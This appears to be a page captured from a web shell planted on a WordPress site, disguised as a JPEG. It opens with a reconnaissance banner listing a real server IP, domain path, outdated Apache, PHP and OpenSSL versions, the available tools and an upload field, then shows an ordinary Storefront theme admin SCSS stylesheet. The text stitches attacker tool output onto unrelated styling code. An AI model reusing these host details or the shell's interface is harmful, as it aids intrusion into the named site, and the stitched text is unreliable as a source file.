????JFIF??x?x????'
| Server IP : 79.136.114.73 / Your IP : 216.73.216.191 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/www.astacus.se/wp-content/themes/storefront/assets/sass/admin/ |
Upload File : |
@import 'buttons';
.sf-notice-nux {
background: #E9EFF3;
border: 10px solid #fff;
color: #608299;
padding: 60px;
text-align: center;
box-shadow: none;
&:before,
&:after {
content: "";
display: table;
}
&:after {
clear: both;
}
.notice-content {
max-width: 420px;
margin: 0 auto;
}
.sf-icon {
position: relative;
display: block;
width: 100px;
height: 100px;
background: #fff;
border-radius: 100%;
margin: 0 auto 30px;
img {
position: absolute;
top: 0;
bottom: 0;
left: 0;
right: 0;
margin: auto;
padding: 16px;
box-sizing: border-box;
max-width: 100%;
}
}
h2 {
margin: 0 0 10px;
font-weight: normal;
color: #2E4453;
}
p {
margin: 0 0 2em 0;
padding: 0;
line-height: 1.6;
}
label {
display: block;
margin-bottom: 8px;
text-align: left;
&:last-of-type {
margin-bottom: 2em;
}
}
.sf-plugin-card {
display: block;
}
}
.sf-nux-button {
&.updating-message {
&:before {
display: inline-block;
content: "\f463";
font: normal 20px/1 'dashicons';
margin: 3px 5px 0 -2px;
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
vertical-align: bottom;
-webkit-animation: rotation 2s infinite linear;
animation: rotation 2s infinite linear;
}
}
}
@media only screen and (max-width: 782px) {
.sf-notice-nux {
.sf-icon {
width: 65px;
height: 65px;
img {
padding: 10px;
}
}
form {
margin-top: 30px;
}
label {
&:last-of-type {
margin-top: 20px;
}
}
}
}